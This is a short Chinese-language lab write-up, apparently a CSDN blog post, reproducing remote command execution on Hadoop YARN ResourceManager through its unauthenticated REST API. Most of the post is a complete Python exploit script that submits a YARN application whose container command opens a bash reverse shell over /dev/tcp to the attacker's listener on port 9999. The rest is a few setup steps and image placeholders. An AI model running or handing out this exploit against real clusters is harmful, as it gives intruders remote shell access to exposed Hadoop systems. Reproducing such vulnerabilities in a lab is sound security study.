一环境搭建

在这里插入图片描述

二、漏洞复现

环境启动后,访问http://192.168.120.129:8088即可看到Hadoop YARN ResourceManager WebUI页面。
在这里插入图片描述
使用exp反弹shell

#!/usr/bin/env python

import requests

target = 'http://192.168.120.129:8088/' #目标地址
lhost = '192.168.120.1' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

kali监听端口9999
在这里插入图片描述
运行exp脚本
在这里插入图片描述
运行完之后,立马反弹shell
在这里插入图片描述
更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。
在这里插入图片描述

Logo

CSDN联合极客时间,共同打造面向开发者的精品内容学习社区,助力成长!

更多推荐